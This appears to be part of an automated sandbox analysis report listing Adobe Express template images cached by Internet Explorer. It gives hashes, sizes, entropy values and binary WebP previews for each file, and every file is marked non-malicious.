                                                                                                                                                                                                                                                        Preview: RIFF.(..WEBPVP8 .(......*,...>u6.H....$4+....in.M..v....J...q....3..P..5P..y..s....W.....o.O.~..........b<....G.O.?..k....?o}l...[.....-.../.>t.......?.{..-.......oS}.......^....7./.~H.........?.>...?..O.o.../...L?P.%.3.....?._...~T}..M............E......._.............K....)o...G>x..f.W.....]...7F.2v..F...Z.7...m..,...pJk.N..*6..aGO......y.C...........A.^.>.{....io..*.i?Jo.6Zr....M..JF...]3..2x...m.8..FN..9...........1v.^K.....6r.Z..Cr........k.A&..`./Z6.)...5...Ig....P...o.....?..X9......::.`q<.a\0k.."Lp..}.>4...V.b..'%.'2T1.....S.$.QF..M..n.*..Cr[..7...q~n.Z.?.S..`Y..r......p....)m!..x..5f.6...v..?..UY.N>3..~.*6..h..?2Z...lN........mC.4...?.}.j...UE..%(..l6m.l)../9.{..BJ....DN.....R.o..QB..0...-..Y.LTx...2...0..E-.@.=...*+v...L...|.l.Vh.../...ki..B.v:[]d..!.uN.o..w.e.*.>o..uX-4.s......C-.'I9mg(...Mh.eHJ..........0.q...!..'F..1.xU..1.0a...}..%F.T.+..W...'p%.BQ..d...e^".!.l+..V:.tZ.7.../.+C.....u.......H....1..G.F.N..>k...G..t95$.Ei4n.N
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_12ef5a4e321ffe3e39b878bd58fdee97bf46640bd[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6054
                                                                                                                                                                                                                                                        Entropy (8bit):7.969083022130987
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:+SWE1O79xG55k6aEtCHRxxSTIMyc1drgL0I2xYJ73B+nWxTpvsq19yF7F7Ba3qCX:lWEw7nEtk0TT/I2aJdHLsqnCBMqCM0qC
                                                                                                                                                                                                                                                        MD5:E80607AD033E658F1F8758E0EA9722F3
                                                                                                                                                                                                                                                        SHA1:B22616E7B8BB002D44B97FAF251C7794CF2D6E22
                                                                                                                                                                                                                                                        SHA-256:CB1F6DB5C13C3F6C381136FC950C25E47E188B6385955CE11FA6F60766B2027E
                                                                                                                                                                                                                                                        SHA-512:8DFA512EB5F1FA11FC31D7A3FC9E76E18B6149CD06690F88EA5D0657C7BACADB88B64F05581060BD9715BA25D52E07A2DF13F0DBA7D0B119A932A1CADB7D1745
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_12ef5a4e321ffe3e39b878bd58fdee97bf46640bd.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....ph...*..k.>u8.I.."!".9....in._....y...]|../.w.......G..Kr.P.y.......<Q..........x.....}../......K./..._.?..B.G.............k.......}.?b.9..~.{0...h.........ZAE.l.,...P.....(/P......u..DA..N...:.J.......+.3.%.E..x..X~..H...d.|X.U...=.....#m;..PV..I.-SV!...>n.....MQ1.....z....9.r..8e.+~.Is.PDo..........f....T.....w[......-..w..F...$a+..4trN....WB..t.o.d..t..G1tj.3.9.%..,.N~..."....Y.F....| .3.W~..Q......?..s7..>4...0.i#...<...+..`...l......P.1..c....~...''...WU.....5o'.8*.....Mtvg....t...dj._..`$.B..8Qq'.....:I6...K..4.u..I.....V......s..oPh....S#y..Q..pJ3r......*...O<...R.....0.0..N.8.z5U...:.........H.S.%.\.yg..yj0.QS..G..+..#O.q...k.{..I....-....9v..1...... ....h&f .wm".I[|d.'.....p....WO.Z...#/.}........u.....;....7.%.0.1>....................`Mc.o}..;.....EB.,..i.Q<(..)...,.$a+..4trN.................{*...W|.\.w..M.._....sp{x...r.K...S+...bD..+K...3C%...n.KA....l^6....$L...'y...H.....W....G..X...sn....]j...$..:wB7..:,..\o
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_139c72bce8c53e0b270c75d5ad9c4256b496c213c[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):14818
                                                                                                                                                                                                                                                        Entropy (8bit):7.988196480680532
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Ai6eIC3MjmNnkXQLGIyZe9b7Tgn6w0/WUpg343L33cDa:Ai6ez3YmNnWv9E7Tg6j/WUp5rc2
                                                                                                                                                                                                                                                        MD5:9CA96FA3504B39AC348B124B98DF3797
                                                                                                                                                                                                                                                        SHA1:53E59B1428E9A02A04259E3C7552B9D860E48414
                                                                                                                                                                                                                                                        SHA-256:7C40F7631BCDFF95A5799E4D0301FDB168FA2603EEF4AE84861ED0B5E57AE835
                                                                                                                                                                                                                                                        SHA-512:92F9D163ECA5AC5F1FBA2561A9A22EA03E780335DB61402257EAC3C8CBE6CF46652A9A5D8E5B8ECD60D084B5C55C297D3DB7A06C3CAC41A935A36817DE94A146
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_139c72bce8c53e0b270c75d5ad9c4256b496c213c.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.9..WEBPVP8 .9.......*,...>u4.G.."!$..P...in.F{B.]<X....m............y/<N.7E....?.zX......}3....../.....;..........G..................}._....#.....?..zE..........h..?..|...'...>.\{.~.............G..}...0..t..5...\.k~.........Kw. );.x..>.......e..U....,#H.g.._.~.v4wVs...t6A~......*..P..<.V..>..l..TN....C"......[.v...|...9.K...K.!.hC...jc_..o...t..&(&...X.$...Qm[..C.._.y{....k&.....uA.yu...u.....X".v.wu.4.t.X....N@xY.\.....^..|n..>A.....mvA..V.......2.vQ.1O..,...B......`7...3...k...+B...G|q>B.s={..YL..'.....o!..[.(....0-|G)o....,....,_.=.2A.@F.{....:7.:.;h..+.D[Y..a.....>..,...n.^.:..N..cU4..w... yaci..;r.q.Q.x.....J.6_+.'7....R...p...."...|....<"..Cs...\!...OA9..Uym...D.....L...Q.....8......S..C...5o..n.^.h.N............y..*.p........y...^M.....T.Nb]P0G.U..9+)....wg...4."[.....R....[....c...I~W.M|.IX.E.......{,.Q...+....."...J...(.B.ZW.,.<;...ez.....F...>...QwR=s.L...!u........n]k.@...+.B~..B.&a*f...!...Y^....8(..[....1.n.F..b.....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1483169d9ed54a159cea2c7282c24b5a771f38d79[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4697
                                                                                                                                                                                                                                                        Entropy (8bit):7.9646103561304535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:ZdOHSfA08M/QFoqQBBN5NOrCcf3ZotmdhsT/3hdRs2zxTS4vTLTOebnlrK:zOHbO4AT7Nu3Zot4hi/vR/NG8TLTOem
                                                                                                                                                                                                                                                        MD5:AF496C39C4A091DEB13EBA02B0BC021A
                                                                                                                                                                                                                                                        SHA1:C835B6C3BF70248157C44D0627717EA94146F30F
                                                                                                                                                                                                                                                        SHA-256:6A9260E75F912B9E50A6C3571C387BEB7821FE6867AB3FD446A1668347665817
                                                                                                                                                                                                                                                        SHA-512:E62B25A50F2DAE17E251A8C6B5CA121EDF9737DEEFCE27FAB5F7648BC724758F84EB345C72CC7A3CBBEE7C63ED3E46D94C74657602B99ABD5B10EEC816A15A04
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF.(..WEBPVP8 ~(..p....*..k.>u:.I$."$$2.....gn..RL.0..3....s..u.17.....5zG........=3....=H<.e..d.L.......o...v...tQ...z.{s....*.>....o....^..u.....7.?..xO......#...w..jF..1.z..V....:.=/.b.B.....N>..fJ.i...I.........CV.y.i5M.}_ 2..#!r*.;..1<...PZr$.e0..z..{.@.....MAt.....w..\.^....L.vk....IW@>V..B..C.qv..+.vD3.......A.....D..r.O.R?.H.e8.G.O..Q 31.y.3H....{....$6..B..k.n^....q../.&....l.Z..i...^U......{]zB...;....(.....M./....v+......R.Z...n'.1-...:l.V...q0}...U.d...gD.<.d0.......B.....}.|m.........!..f....e,....}.}..5.....6.~.fL.-.AO...h...O.".1c......;4....m..!r.p.XvI.m..q.#..S...C.TYo-@.Q..v..Q.{......?>P....V......:....M....L..R.\......p.U.Y:...x..6.u.~n3.v......4......$(..;N..n.....6..-..+Jf..B../.#..C.....+cz.....z.".(S..G.[.0oS..o....dg*......~p*...F[.p..e.,\..].e..8q@rK..].P?..o....`.~.R{.w.j..(....U]..&..Vs........[[.s..z.p.q.m.~..wb.bkT...5........g....j4......H..EeG+ .G4.....v].E.].)!.HCw.....p....7......K*.....]..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1487d92c7935ccbb3c949843f5e5ed811950def06[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10954
                                                                                                                                                                                                                                                        Entropy (8bit):7.980183827990017
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:yJ0W/gIwjr6VRN5JqNMUFFY0KaSC2wJx7ADnosCCERedFO8OegQV:pvI6mvNaNVRSwUDos7lUQV
                                                                                                                                                                                                                                                        MD5:1873FC0F0AF72F35A8F4AA458E20BCCD
                                                                                                                                                                                                                                                        SHA1:B7D51AEE2C660794509896A565F0719B4AE296B0
                                                                                                                                                                                                                                                        SHA-256:9F05DAD13A701D1D22A2C478FE6C32110E57994F2C2BB9341441DE85EB413F5E
                                                                                                                                                                                                                                                        SHA-512:56E182E72A6C01958DBBA2841C55706F8653F5B7B9F0F4B9A5C28580F3B8AC74061BC9BD94BD3DA07A143D1651CF8C81247582D0FF21F50F6B6DA1C3C59EE0CC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1487d92c7935ccbb3c949843f5e5ed811950def06.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.*..WEBPVP8 .*.......*..k.>u2.H..."%......in....U.9....#.A.....{/B........rYY'....9...o.....f.2...-...=..e.....p..|........}..9........._.?v..5.......'.O./...>.>....w....._`.............O.....~..4}..g....`?.......s............{P.....?._...?......U....o.O..u....%...ID...e{.bX../...w.:.=C.Hf.8..o.!.6M.......c....W..$Ws.%v9bd....[T..Az..q.....[.d..g.}r-..).m_.Lo.o...l..CYC.D.......raI....C....l..hWF+.....|.(..Q........Z...Nh.........,....!..^..&.V..U%8.e..../.;....#o..NJ..,.M.Re.0..@...|XB5.<.K&Y...m6...eNz..qPj..l..e<bx..J....hQ...4Ba....^....#...E1....H........B,0....$Y.......].$....>+..4..4..=`....A.e..Fh..o...E......9.b....hwkKf.....w..m.....l.......5+.........2....Lp.=.....Ov.....<....[.._g.....e.dL.5.$.3.o....6...5.D....>..R.(.Q.<...-WT...o.3&T)7...N...X.k-d.6p.,.@.........z7A...t..M...),.(!.........s.....i.....S..0.~k....w+..#...=.2.se>..#..!.vN]K..)7.T...?...A....v......e.B...'...3...l.G.9....(\4.G..("#i%.~..H./T..x..#..).L[."..]
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1707de0129dfc8f4ddadb55149ab2dfd705e786b2[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9086
                                                                                                                                                                                                                                                        Entropy (8bit):7.979107058438218
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ro5qJbhyval4dyRHzCucw8FtcwsKVZKfXXSLmkOaWtjr5DB1Hm:rYqJ1yvq4dyRHzCfw8DgsmkOaI5DrG
                                                                                                                                                                                                                                                        MD5:81485C1DC373C58B7D6B7E09DEB1B1E1
                                                                                                                                                                                                                                                        SHA1:72B68330FE262ED781B97B26746BB41C96F28179
                                                                                                                                                                                                                                                        SHA-256:F9FC8250106A68777FF81B1EE71BF189AB67E68CB192275998D728CF79BB1C09
                                                                                                                                                                                                                                                        SHA-512:3D0F19A7A83B8D66465519B9C68C2DD83C9F5502C44B99D691BEB702BCBB85BE771826867085F37B18BC1A22FBD79EE50EF36293B4111E0573DF2F3B99E82275
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1707de0129dfc8f4ddadb55149ab2dfd705e786b2.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFv#..WEBPVP8 j#.......*..k.>u6.H....$......gn.q...s...=..>n......U....+.w......3...o.\..=.......?......2..?...}5._..A}....?N.M.O2.@<......o.>.....Ng.._Q?..O. .9.....(?n..,.y.p...K..z(.........W....v....#$.>5o."s..)*?iY.L.[.......;.c{....\..R:..>..wf.U..g........M..6......-.8{I.}9....=ws 1.C..*nf.AS...gw..t?.....V.iW...jF...........".}.;.Y.X..x0*.....N..}..I....h.3.4..=....2-1.V.r..r..`.....%<p.".....w.R_.79.v.'....W"2....D....jY.v.|.au..x(.bI.22....=...;.t}......0.,..t+...{.K..M..)r....1bR.T.....8*(;...........|\..Z.....K...k:...+hJSl..{.S.2a../.~n..i+...$..AY.JfU..--..Js..G.....j.......z.5...Izs.t..8JP....Q?.A.%?6...$..d.....M..Y^......F......./Q:..m..<..'.....c.......A.*.&...."P.W."!x.70.m...3f.)............n6..d.......O...2.j....E....7.l.f......!...nDSf..9..$.7.2&.d8....z........pa..,.U`2.....1...p..(.oB.O.a.S...LX'.@...v..6.!.1kjnrO:....<^....'.ru.E..s8......k...#3......C&..S.....cT....TN.kv".8....-.*,z..I..../...A.'...}(....n..(...7W.......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1763375371cdc365588efa0a63cb3007097c0d812[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9170
                                                                                                                                                                                                                                                        Entropy (8bit):7.974658204077721
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ZbGChti+M1jgiUzWyXvG4FK15AF/gLS6Qho6:hIV2iiX9K1ugLT6
                                                                                                                                                                                                                                                        MD5:9256399AC0D88111505FF8915A8238DD
                                                                                                                                                                                                                                                        SHA1:3C07ECB2647AD5A659EEEF581141BFB3E504F2D6
                                                                                                                                                                                                                                                        SHA-256:09D13D78877FB6A69B773A92E913B960E7CD9F94572DA98CEBB6EA8D66A655BD
                                                                                                                                                                                                                                                        SHA-512:6B9FFDA284972BFAD830DC9F2CED9441755BB544AC2EC71DE5A9141462E0E381D09D9FD96CB9FDB582978896ABAC373C7510CD17C3A157C2C7CB7C240C81879B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1763375371cdc365588efa0a63cb3007097c0d812.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.#..WEBPVP8 .#..0....*,...>u6.H....$s.h...cn.v....Ku.-......_......o........../.z.....?...Ko1.._.....}R.......w.o..G..b....}:..?......z.......c.....W.=......dH._.....p?/......._.?.z.~Y...o.......3..?......-...W._....@...........c...^..^...#.O...o..........................u.....g.o.?f..o.......g...S_].....zn.M..h^..M...$.$..E.;...@.."..)......7!..w,."1...6|...R$............o.9}}.".T..(&n..T0..v...5.J.$R....W..].....e./...[2b...N.|..z....|.SX....pg...c!..5s.cK.#...d....b....3<.y_.gc...K.]..kZ...Q...8bA#.....F.....UfA.K..Xj@.N.k.<..%.2..D1.".A.H.....f..Ie6......2.....J.....K..zR.^..."....._.....xoJU.@.....}........Gk.$3>..@E.T{s.C.n0.....MF...P.A...h.x95..NG.*6.y.l.L......Y.r;.!..r..S\..D..#..RDnC.9i..a"Y.hQ.....R*..<.0.M.lyg...#......k......3+....C.w_U..J..2IT...GR..............:v.k..Q.......AqG.]=..u....C.b..V. ..nS<w(...X.E2...._.}J.q.b?.cm...7bX.,.Cg..wy4......h#.A....A-.3...g.3.fe.g..B-+.........y.W<. :.!-.$..+e6].&dC,..87.CZ&.!...0.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1775a36e7c0e3e4a36b1a94d39053618d1bc92472[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):7048
                                                                                                                                                                                                                                                        Entropy (8bit):7.970066234069555
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:wpCF1VdUqZDLDcVbm3AyHRi4fOzfJZzpEMtYdq13:wQLHXZDLDJ9Het
                                                                                                                                                                                                                                                        MD5:8BF3F16CDC487CE707A270C6F605F943
                                                                                                                                                                                                                                                        SHA1:E41CFB6CC6EE352D869A1B8B4C1FF5A7A17981F1
                                                                                                                                                                                                                                                        SHA-256:DA45D15A2631CC685B569795E64811671F1866E9C2009BF08FE89CD3C98F43EC
                                                                                                                                                                                                                                                        SHA-512:5B26BA9C45BB5ABF619DAF7A404A80F48E8F5F7450D642BE91A6734B0ED6382D27D1A66F5E1EE97A0F917EAE956C46D3DC0B926230F0E78F9F5B6EDA33818B76
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1775a36e7c0e3e4a36b1a94d39053618d1bc92472.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 t....w...*,...>u4.H...!$RK...gn...P..]z.$........~....E..K.....K.'.../.o=|C...?.=.C....c?..........%....._._.~..U......|..../../Y.!.....^...?........#.....?.x.}c..._.?..`?......................V...'._...........W..?......./.B..L.... ...., .s.C....~ #....FY..O.Xm.,..w..&.<.ZeW4.X...f..D.JR..2...7.J........MG....da.......Co|....Ug.>.9D...r/.Q..Z$_"]y...I..1x...y.Zo=...n..%..t.G....8.....wE.......d..;y..;.k..`.Cf......v....68._NP..:q.D..:H.V.T.>.Z.{.:...W.....:$.....!l.5.kd.w.{(........A..`ks..FN/.g..Zp..~S..99.x....d.......U.@f...K@..VOb2...L>...=g."c-%..b8.wm .?.a..`...{......\q.M..E@....2.eB|)...$..Ri..4Z...D.. .u'........B.....4.=.........Z.}%B...*}*.d%.D. t.m..e...-.1.=........V.KA\.~b.+...}.`.vG$..8.,C.)o../......G..Z....|..V$(o.S..K|.W..N).(.tegz......(n.X.B4w..P...P...dv.I....o{5;...^>2..y.tj.$>.c..)....y....j.....c4n+z.q..G....R.7LMJ....^g.dH.f..c...Q..AZ.....5...h6.?:._.....n.6..K.CO.eO.XA....G<zZ..b7....R..~@....t..]I.7%
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_17a679af01aefbb64a6df5151c42b14558683b8bf[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9250
                                                                                                                                                                                                                                                        Entropy (8bit):7.975672208577694
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:I0dp78X10EPjS+morlggq8qKMX7Bs46t0TMhy15ENNMzzgy3xa:IgpGR5rlHq8pMXls46uTMQ1Qcxa
                                                                                                                                                                                                                                                        MD5:B7208A9A26F914E96E063E8978136FE1
                                                                                                                                                                                                                                                        SHA1:0B18AA33D9FF66D2BB3B76883FDD130AAF5C713E
                                                                                                                                                                                                                                                        SHA-256:8C29335D71C59F5368B71EF1B51A5FDD970AD9F8968AAE78DC599E8D6BC44065
                                                                                                                                                                                                                                                        SHA-512:104CA8A2251AAA691E3185B8580217466A3F209CE6CDF21625CA7AECB9D1288853CA010B2DE1B9A2B3EA82DC4B85B13DFF4723473A631DF39B73030B6456481F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_17a679af01aefbb64a6df5151c42b14558683b8bf.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.$..WEBPVP8X..............ALPH.......I.i....m.m.m.m.m....s.u...#"&..M..l.n#Fy..,d....g)..<.6...o2z................#...u.....msE!.0...e.hd.f~...#.mX/.3#.u8.hC.ay.. .0.{.#.q..........U....U._..n^`u..n]G;2-......4xC....^.qc......_...9.....tT.oH.^..&9...8.`|...V......s...4...F1....7........:c.&..>T2Y...`.Y&.P]3..6..F)...;er..4....Cd... .....`D..........?..O.'........?..O.'........?..O.'......vB..v...a.4;.K.....C.'........?..O.'...|..b%..CV.CaT..i..].%.........:.jV........p..L...i..d3....4O....M.AR....h...../..>!...A...f...j...eF.y.)i.`....T!...w@...-".-TpB[..4.c..FsDg..>...Erq..85.L.c..T.5.}.J.Q......^..7..[...^x...p.S.^'..h.......B...d.f........X.A..oq;...n..c.].g.. ....J.~..{BBb..Fy...k._|...}.3.1x#x....%.......[.KBn.VP8 .!..0....*....>.F.K...*!..a@..gn..J.....|.....Q..#?.6....r.v....U..c.../P^]....7....7y......{sz..z.{...2............M.<h..ao-.f...Um.LB...ZK.Sp....e....Oh.3(..]=P.j........#.=...b......L..%.GL.jK:......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_18f5956fe507e677844b26f056a31426ee8bd8b29[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9046
                                                                                                                                                                                                                                                        Entropy (8bit):7.9762557737334285
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:qTse9aZjjMbSLxUw37Y/6tC0MHePZKmfX82yMMdPXsDPvFdTKLAqU2ic:qTsJlgbS1U0A6t0eX82yMMdPcz9pKLsc
                                                                                                                                                                                                                                                        MD5:52F45154DFAAA9768A1AC5A475BDEAF5
                                                                                                                                                                                                                                                        SHA1:B190585DE7BBFEEBBB7AB72213ADD9E90F4BE276
                                                                                                                                                                                                                                                        SHA-256:D4349A04E0CEBC02D67615B3FE04816B520DFC3505A348C8726BA85C8606F1A9
                                                                                                                                                                                                                                                        SHA-512:5F5C04917BBFEBE4A20A55050BF959932728CA35C2A05E5BFADBDFA59470C019EFC7691680164BB88C627A195FB6CE9DE6CCE79FD9387E3DFA95040F3A25406C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_18f5956fe507e677844b26f056a31426ee8bd8b29.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFN#..WEBPVP8 B#...~...*..k.>u6.H....%7K(...in.q..[9...S........z.{....}...._R:.w...*..x...._.~.>@...O.O.+.W.{+...^...}......?.}F...k...o._........7...O..........R......7.............L..^..p.....[....O,3.D..EU8..(..F.TG.q.3...0.c.l...}........px...^........Ym.9\..._c..E...k..N..N.`..d1..A.m............+DNHg.R,.......8..l....o..tB.".....?.T....Z...z..f..1.c:................../...;...J...A..PQw...@...)Et!..d&.%\Y.km....|;].Ts0%..N.Y.`..@.f....`....@.,.r8.L/~..j..sk.......\%~.2g./U;..s".Zy.`....72.\&...t..P...z....t...r.nd.6........+....&........M...j-.I./.:v..p}IM.(..j;u.;.%E.H.s.47..k.Q>...G.l0DQZ}~.D.....)}>}W....U..j.....C+.^UN.A..#..j*/Z.leX../...q..#2.RRKM....\.{\...........5]..d<.....w.......D..<.n.n...b[M$..rq.h.A...*.Wjr-.+.n1.+."q.f$.~!.<.Y.X...IYx.{...5....ib..:..Va..^.C...=........+.(....K(.....U.'..s..kI...M/.-....N.<I.s^I.h..H`.......G#...>.`3..|t.1.......e5...S.i...n....e....x..'....N.....TC....S....}...5.5[)Z..q.od...k.e9
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1a3a5d0b4d3b4cdafd28d6e4e2582aa89694802d1[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1380
                                                                                                                                                                                                                                                        Entropy (8bit):7.855406519697064
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:TDcMLG35QnfxBClsQYdrL1U3xlFknCeiqYVj9IvtYNl7eoFjGsXc7U+w0EvJWDYD:Ti56fxBEsQYdH1EPoCeCVIE7eGj7qU+G
                                                                                                                                                                                                                                                        MD5:C9423EE557A55FC4D4066E9E4FF39674
                                                                                                                                                                                                                                                        SHA1:96EDEB77035FB98CD312D32D695C42C6CC93E1BE
                                                                                                                                                                                                                                                        SHA-256:FB81C10F0ECCCCA81FF7E96950920152216F130CCE3BDC9B38BAB2CA1B152B31
                                                                                                                                                                                                                                                        SHA-512:5E944BEA099252494B5B693284825F9FA223F64A32BB81C82F52DBE21A29207A990E5BC1EA47CF32E3FE8E1CB24A6233CF43B0FC3722255F0281C7BB2425C88F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....0a...*....>.>.I%.".(Rm`...in.K....g]_...R..........O...M.....r?K......N............k.....?.x.j..`......~..m....>.?......j.z........m.MS.v..6.&3c."..O8=BS..RA.....Po|.u.X.<.WAF;\..A.T.....7.o.L.....s..c....,...4....P....t....QK.6..9..>...'.......5.b..."_..&\W...R@..?+....O_U.1,...Z....`.|lA.[..B....c..a..Z..."R.6.......L....D.l..`.n.a.7..W[^O....2...u...L?Q..Nx.V.@...8X'.........@.N.L..... t.y.....~..;.*..DZ0V.........['.....;..QS..[w.)..<.m.)............E.z.O...>.V..."L......}..r@Y.9...a..o.x...'.!.6T....-ro.....)~...h...,b5..+;......F.........]...D.}.........6Wqj:.t..pe...8....zfB..z.U..9znLu..[..r4..e..D....a.......M..9.WY|tG..s.,<.~Y#...e..iM..k...3..K@.`;.0xf..#...QB...G..*..-K..&.AZ...b.W.C.n%..sB.sj}Zu....6.&..;^X...Xv......V..&..;P.......Z....B.......0......K.............*.....T.*g..u}.....\5<.uz8.Y5...+.Jo........LD._.e....E)zp.[..r...x,F..I...._..*.{;.........{...?..7...V|C=x.*8...{`..r.k....g.9..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1a4cd1509b5f28e646261219c740a1a76ceb73f0f[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                        Entropy (8bit):7.800063453416385
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:MhcPlFBuhB9Wa++h8lMd0+3an3V2AjlzCN2q/2A8dIRZfCY7kSon6:M8mmV+YMEn3nlz1e2RAoYof6
                                                                                                                                                                                                                                                        MD5:098727CE6D4653C3407EC3836BF44F70
                                                                                                                                                                                                                                                        SHA1:3151C6B9EC678F22A08A7A5664A1E2AEED2B8C10
                                                                                                                                                                                                                                                        SHA-256:84E742AE47BB8E493E44BEFACB9AA94F976A38F68CBACDC04EEF4C08ED354342
                                                                                                                                                                                                                                                        SHA-512:552668175ECC5EC37CA3407021EDC3EC18C05BDB7930B2F857BE6F7F86683888EF5198D963D080796A19A21CFB994B48D4C4B7F247541B3EFE9EDF0E9B513E31
                                                                                                                                                                                                                                                        Malicious:false
